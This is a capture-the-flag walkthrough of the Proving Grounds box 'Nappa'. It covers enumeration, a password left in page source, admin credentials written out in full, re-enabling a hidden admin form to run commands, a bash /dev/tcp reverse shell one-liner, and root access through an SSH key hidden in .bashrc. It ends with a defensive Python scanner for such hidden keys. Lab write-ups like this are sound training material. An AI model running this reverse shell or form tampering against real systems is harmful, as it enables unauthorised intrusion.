Offensive Security Proving Grounds Walk Through “Nappa”

Vivek Kumar
Apr 27, 2022


Initial Foothold:

Beginning with the initial nmap enumeration.

Running the default nmap scripts.

Anonymous FTP login is allowed. Checking out the contents of the shared folder.

There are many files here, but I could not find any direct credentials in them. Moving on to enumerate the web service on port 8080. Many usernames can be enumerated from the index page.

In the source code of the register page, I see a password left in clear text. We now know a set of usernames and a password, but the login page requires an email address. I registered as a random new user and opened the question posted by admin.forum; that user's email address can be found in the page's source code.

Using these credentials to login. admin.forum@easysetting.com:it0jNc6L/r090Q==

We see an extra option under this drop-down when logged in as admin.

Checking its source code, there is a form, but the input and submit fields are commented out. Modifying it through the browser's inspect element option to check whether it works.

Comments cannot be edited, so I created a new HTML element and pasted in the same commented-out code, then removed the readonly attribute. We can use this to get a reverse shell.

bash -i >& /dev/tcp/192.168.49.243/8080 0>&1

Privilege Escalation:

Checking out the contents of the user's home directory, we can see a .bashrc file containing an unusually large payload. One useful trick is to run wc on all files in the user's home directory as a matter of good practice, so that you don't miss things like this.

It is a base32-encoded SSH private key.

We can only see two regular users on this box, which means the key belongs either to katherine or to root. It turns out it belongs to root. Using it to log in as root via SSH, which is running on port 60022.
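From the defender's side, the finding above (a root SSH private key sitting base32-encoded in a user's .bashrc) is exactly the kind of thing a periodic dotfile audit should catch. The following is an added example, not part of the original walkthrough: it scans the common shell rc files for long base32-shaped tokens, decodes them, and flags any that contain SSH key markers. The rc file names, the 100-character threshold and the embedded sample rc content (which encodes a placeholder PEM envelope, not a real key) are my assumptions.

```python
import base64
import binascii
import re
from pathlib import Path
from typing import Optional

# Shell rc files worth checking; the Nappa box hid the key in ~/.bashrc.
RC_NAMES = (".bashrc", ".bash_profile", ".profile", ".zshrc")
B32_TOKEN = re.compile(r"^[A-Z2-7]+=*$")
KEY_MARKERS = (b"PRIVATE KEY-----", b"ssh-rsa ", b"ssh-ed25519 ")

# Constructed sample rc file: three ordinary lines, then one long base32 blob
# that encodes a placeholder PEM envelope (not a real key).
FAKE_KEY = (b"-----BEGIN OPENSSH PRIVATE KEY-----\nPLACEHOLDER\n"
            b"-----END OPENSSH PRIVATE KEY-----\n")
SAMPLE_RC = ("# ~/.bashrc\nalias ll='ls -la'\nexport PATH=$HOME/bin:$PATH\n"
             "echo " + base64.b32encode(FAKE_KEY).decode() + "\n")

def decode_b32(token: str) -> Optional[bytes]:
    """Decoded bytes, or None when the token is not valid base32."""
    try:
        return base64.b32decode(token)
    except (binascii.Error, ValueError):
        return None

def scan_rc_text(text: str, min_len: int = 100) -> list:
    """Flag long base32-shaped tokens; real keys encode to several hundred chars."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for token in line.split():
            if len(token) < min_len or not B32_TOKEN.match(token):
                continue  # ordinary words, paths and aliases never reach min_len
            decoded = decode_b32(token)
            is_key = decoded is not None and any(m in decoded for m in KEY_MARKERS)
            findings.append({"line": lineno, "length": len(token),
                             "looks_like_key": is_key})
    return findings

def scan_home(home: Path) -> dict:
    """Scan the known rc files under one home directory, keyed by file name."""
    report = {}
    for name in RC_NAMES:
        rc = home / name
        if rc.is_file():
            hits = scan_rc_text(rc.read_text(errors="replace"))
            if hits:
                report[name] = hits
    return report
```

Run `scan_home(Path("/home/<user>"))` for each account to audit a host; `scan_rc_text(SAMPLE_RC)` returns one finding on line 4 with `looks_like_key` set to True.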
